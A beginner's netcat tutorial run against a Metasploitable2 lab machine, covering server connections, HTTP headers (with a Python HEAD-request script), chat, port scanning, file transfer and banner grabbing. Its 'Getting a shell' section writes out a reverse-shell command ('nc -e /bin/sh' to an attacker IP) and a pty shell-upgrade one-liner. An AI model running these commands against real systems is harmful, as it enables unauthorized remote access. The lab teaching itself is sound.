Beginner's guide to Netcat
In this article we will learn some basics of netcat and how to get a shell by using it.
Introduction
Starting Netcat
Connect to a server
HTTP Header
Communication via netcat
Getting a shell
Port scanning
Introduction
netcat (also known as nc) is a computer networking utility for reading from and writing to network connections over TCP or UDP.
With the help of netcat we can investigate a network and debug it as well.
Starting with netcat
To get started with netcat we type the command nc -h

These are the command-line options we can use with netcat to perform further operations on a network.
Connect to a server
Here we have used a Metasploitable2 machine to set up the FTP server so that we can connect to it. But before connecting, let's check whether port 21 is open or not by running the command
Command used: nmap -p21 192.168.43.235

Here our Metasploitable2 machine is configured with the IP address 192.168.43.235. So in the next step we will try to connect to the server using nc.

After providing the correct login credentials we have successfully logged into the server.
HTTP Header
We can use nc to fetch information about the server.
To do this we will use the same machine.
First of all we check whether port 80 is open or not by executing the command nmap -p80 192.168.43.235

Port 80 is open. Now let's fetch the HTTP header by connecting with the command
nc 192.168.43.235 80
and then typing the request line and a Host header, followed by an empty line (press Enter twice) to end the request:
HEAD / HTTP/1.1
Host: 192.168.43.235

The HEAD / HTTP/1.1 request returns the response headers of the HTTP service running on the server.
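As an added example (not from the original article), the Python script below sends the same HEAD request nc sends above over a raw socket and parses the status line and headers it gets back. Because the article's Metasploitable2 host is not reachable here, it starts a constructed stand-in server on loopback whose Server banner is made up; that Server header is the kind of version disclosure a defender should look for on their own hosts.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def head_request(host, port, timeout=5.0):
    """Send 'HEAD / HTTP/1.1' and return (status_code, headers_dict)."""
    # HTTP/1.1 needs a Host header and a blank line to end the request;
    # typed into nc, that blank line is the extra Enter after the headers.
    request = (
        "HEAD / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        # A HEAD response carries no body, so it ends at the first blank line.
        while b"\r\n\r\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status_code = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_code, headers


class _Handler(BaseHTTPRequestHandler):
    """Constructed stand-in for the article's web server (not the real host)."""
    server_version = "Apache/2.2.8 (Ubuntu)"  # constructed Server banner
    sys_version = ""  # keep the banner free of the Python version suffix

    def do_HEAD(self):
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # silence request logging
        pass


def start_test_server():
    """Start the constructed server on an ephemeral loopback port."""
    server = HTTPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Call start_test_server(), then head_request("127.0.0.1", server.server_address[1]) to see the parsed status code and the Server header the stand-in discloses.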
Communication via netcat
Netcat can also be used to communicate, or chat, between two users, but before any communication we need to establish a connection between them. For this we need two machines on the same network; we can do this using VirtualBox or any other virtualization utility.
In this scenario we have to create two users. One will be the listener and the other will be the initiator.
Let’s create the listener first using the command:
nc -lvp 4444
-l: listen mode
-v: verbose mode
-p: local port

Now it's time to set up the initiator using the command
nc 192.168.43.235 4444
Here we have used the IP address of the machine on which the listener is running and the port we provided earlier (4444).

Now the connection is established and we can start communicating.


We can see that communication between the two users is successful.
Getting a shell
Netcat can also be used to get a reverse shell. This is very useful in CTF challenges: after getting a reverse shell we can attempt privilege escalation to gain root access.
Here we need two machines. One will be the attacking machine and the other will be the target machine.
IP of targeted machine : 192.168.43.235
IP of attacker machine : 192.168.43.8
Execute nc -lvp 4442 on the attacker machine

Now let's execute the following command on the target machine
nc -e /bin/sh 192.168.43.8 4442

As we can see, we managed to get a shell on the target machine. Now we will use a Python one-liner to get a proper, interactive shell. First of all we have to check whether the target machine has Python 2 or Python 3, so we run the following command in the shell we just obtained (it executes on the target):
ls /usr/bin/python*

The target machine is using Python 2, so our next command will be
python -c 'import pty; pty.spawn("/bin/bash")'
This gives us an interactive bash shell on the target machine.

Port scanning
We can also use netcat for port scanning. netcat can perform TCP and UDP scans; here we use the -z option, which checks for listening ports without sending any data.
Command used:
nc -v -n -z -w 2 192.168.43.235 21-8081
-v: verbose mode
-n: numeric IP addresses only (no DNS resolution)
-z: zero-I/O mode, used for scanning
-w: connection timeout, in seconds

To perform a UDP scan we add the -u option.

Some more information
Netcat can also be used for file transfer.
We will use two machines. One is Kali Linux and the other is Metasploitable2.
We will create a file hey.txt on the Metasploitable2 machine and send it to the Kali Linux machine.
On the Metasploitable2 machine, type nc -v -w 25 -p 8888 -l < hey.txt

Now, to receive the file on the Kali Linux machine, we execute the command
nc -v -w 2 192.168.43.235 8888 > hey.txt

After some time the connection is closed automatically, and we can see the contents of the hey.txt file by using the cat command.
Netcat can also be used for banner grabbing:
nc 192.168.43.235 22

So this was a basic guide to netcat. It's a very useful tool in CTF challenges.